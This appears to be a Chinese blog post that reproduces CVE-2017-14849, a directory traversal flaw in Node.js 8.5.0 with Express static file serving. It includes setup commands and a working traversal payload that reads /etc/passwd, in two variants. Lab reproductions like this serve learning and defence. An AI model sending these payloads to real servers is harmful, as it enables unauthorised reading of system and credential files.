浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)


Posted in Javascript onNovember 10, 2017

0x00 前言

早上看Sec-news安全文摘的时候,发现腾讯安全应急响应中心发表了一篇文章,Node.js CVE-2017-14849 漏洞分析(https://security.tencent.com/index.php/blog/msg/121),然后想着复现,学习学习,就有了这篇文章。

0x01 漏洞简介

CVE(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14849)上面的描述是这样的:

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.

换成我们看的懂的意思就是node.js 8.5.0 到8.6.0 之间的版本会造成目录穿越漏洞,读取任意文件,而漏洞的原因是因为对”..”的处理和另外的模块不兼容。

打个比喻就是有一个人开发这个模块,另外的一个人开发另外个模块,大家对于这个东西的处理不一样,从而导致出现了漏洞。而这里的模块就是node.js 和 express。

影响版本:

Node.js 8.5.0 + Express 3.19.0-3.21.2
Node.js 8.5.0 + Express 4.11.0-4.15.5

0x02 node.js是什么

Node.js® 是一个基于 Chrome V8 引擎的 JavaScript 运行时。 Node.js 使用高效、轻量级的事件驱动、非阻塞 I/O 模型。它的包生态系统,npm,是目前世界上最大的开源库生态系统。(抄从官网)

0x03 express是什么

Express是基于 Node.js 平台,快速、开放、极简的 web 开发框架。(同样抄从官网)

0x04 如何复现

下面采用腾讯云开发者实验室搭建环境进行快速复现。

复现准备:

0. 腾讯云开发者实验室的云主机一台 (我这里用的是《基于 Ubuntu 搭建微信小程序服务》的实验主机 ubuntu 16.04 64位)

1. node.js 8.5.0 (https://nodejs.org/download/release/v8.5.0/)

2. express-4.15.5 (https://github.com/expressjs/express/releases)

3. burpsuite

Step 1安装node.js 8.5.0

下载node.js 8.5.0安装包

wget https://nodejs.org/download/release/v8.5.0/node-v8.5.0-linux-x64.tar.gz

解压安装包

tar -zxvf node-v8.5.0-linux-x64.tar.gz

移到通用软件安装目录/opt

mv node-v8.5.0-linux-x64 /opt/

安装 npm 和 node 命令到系统命令

sudo ln -s /opt/node-v8.5.0-linux-x64 /bin/node /usr/local/bin/node 
sudo ln -s /opt/node-v8.5.0-linux-x64 /bin/npm /usr/local/bin/npm

验证一下:

node -v

输出版本号则表示配置成功

Step2 安装express-4.15.5

下载express-4.15.5

wget https://github.com/expressjs/express/archive/4.15.5.tar.gz

解压压缩包

tar -zxvf 4.15.5.tar.gz

进入express目录下,安装express

cd express-4.15.5 && npm install

进入到expresss-4.15.5/examples/static-files目录里

node index.js

Step 3 发送payload验证

Payload: /../../../a/../../../../etc/passwd

浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)

0x05 漏洞原理分析

为什么payload会是这样的呢?请参考腾讯应急响应中心的那篇文章(https://security.tencent.com/index.php/blog/msg/121),写的很言简意赅。

(还不是因为自己菜,分析不出。。。。)

注意:该漏洞是建立在文件夹通过express.static 来托管的情况下,因为在这种情况下才会使用normalize函数进行path标准化。(发现来源于p神的分析)

比如代码这样写:

app.use(express.static(path.join(__dirname, 'static')));

那么payload应该是

/../../../a/../../../../etc/passwd

但代码如果是这样写的话:

app.use('/static',express.static(path.join(__dirname, 'static')));

那么payload应该为:

/static/../../../a/../../../../etc/passwd

0x06 后记

复现很简单,但分析原理很难。至少我现在还没弄明白。等我弄明白了,再写写怎么分析与跟踪吧。

其实这里有一个挺有意思的点,那就是一些重大漏洞的追踪问题,关于这个漏洞官方早在九月份就已经发布了说明,而这个问题是在最近才得到重视,很明显就算是腾讯也没有第一时间去跟踪CVE的更新列表。

而在腾讯发了这篇文章之后,P神把复现环境给弄到了vulhub(https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849),速度之快令人惊奇。然后再代码审计里面发了,在微博里面发了。再接着整个安全圈其实都知道了。

然后这里我们得出了一个结论,如果想要得到第一手漏洞预警与学习,应该时刻关注着CVE列表,努力做第一个吃螃蟹的人。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Javascript 相关文章推荐
利用js跨页面保存变量做菜单的方法
Jan 17 Javascript
理解Javascript_09_Function与Object
Oct 16 Javascript
jQuery 网易相册鼠标移动显示隐藏效果实现代码
Mar 31 Javascript
JS简单的轮播的图片滚动实例
Jun 17 Javascript
js图片轮播手动切换效果
Nov 10 Javascript
微信小程序  生命周期详解
Oct 27 Javascript
JavaScript中Promise的使用详解
Feb 26 Javascript
jQuery UI Grid 模态框中的表格实例代码
Apr 01 jQuery
利用Angular.js编写公共提示模块的方法教程
May 28 Javascript
jQuery Layer弹出层传值到父页面的实现代码
Aug 17 jQuery
vue自定义键盘信息、监听数据变化的方法示例【基于vm.$watch】
Mar 16 Javascript
使用JavaScript和MQTT开发物联网应用示例解析
Aug 07 Javascript
angular之ng-template模板加载
Nov 09 #Javascript
深入理解Vue 单向数据流的原理
Nov 09 #Javascript
node.js基于express使用websocket的方法
Nov 09 #Javascript
angular2系列之路由转场动画的示例代码
Nov 09 #Javascript
使用ef6创建oracle数据库的实体模型遇到的问题及解决方案
Nov 09 #Javascript
基于vue配置axios的方法步骤
Nov 09 #Javascript
微信小程序倒计时功能实现代码
Nov 09 #Javascript
You might like
漫荒推荐:画风超赞的国风漫画推荐 超长假期不无聊
2020/03/08 国漫
php实现文件下载(支持中文文名)
2013/12/04 PHP
fckeditor上传文件按日期存放及重命名方法
2015/05/22 PHP
一个简单安全的PHP验证码类 附调用方法
2016/06/24 PHP
Redis构建分布式锁
2017/03/28 PHP
php实现微信公众平台发红包功能
2018/06/14 PHP
laravel orm 关联条件查询代码
2019/10/21 PHP
PHP7 list() 函数修改
2021/03/09 PHP
MooTools 1.2介绍
2009/09/14 Javascript
javascript工具库代码
2012/03/29 Javascript
Javasipt:操作radio标签详解
2013/12/30 Javascript
jQuery实现图片轮播特效代码分享
2015/09/15 Javascript
apply和call方法定义及apply和call方法的区别
2015/11/15 Javascript
NodeJS与HTML5相结合实现拖拽多个文件上传到服务器的实现方法
2016/07/26 NodeJs
jQuery获取单选按钮radio选中值与去除所有radio选中状态的方法
2017/05/20 jQuery
AngularJS 控制器 controller的详解
2017/10/17 Javascript
详解webpack-dev-server使用方法
2018/09/14 Javascript
使用express获取微信小程序二维码小记
2019/05/21 Javascript
python实现的登录和操作开心网脚本分享
2014/07/09 Python
使用Python中的tkinter模块作图的方法
2017/02/07 Python
Python 稀疏矩阵-sparse 存储和转换
2017/05/27 Python
Centos7 Python3下安装scrapy的详细步骤
2018/03/15 Python
Python supervisor强大的进程管理工具的使用
2019/04/24 Python
Python数据结构与算法(几种排序)小结
2019/06/22 Python
在pytorch 中计算精度、回归率、F1 score等指标的实例
2020/01/18 Python
基于Numba提高python运行效率过程解析
2020/03/02 Python
Python实现初始化不同的变量类型为空值
2020/06/02 Python
CSS3 选择器 伪类选择器介绍
2012/01/21 HTML / CSS
html5 svg 中元素点击事件添加方法
2013/01/16 HTML / CSS
3个CCIE对一个工程师的面试题
2012/05/06 面试题
校园创业策划书
2014/01/14 职场文书
2014年端午节活动方案
2014/03/11 职场文书
节约用水倡议书
2014/04/16 职场文书
办理房产证委托书
2014/09/18 职场文书
英文导游词
2015/02/13 职场文书
幼儿园老师工作总结2015
2015/05/22 职场文书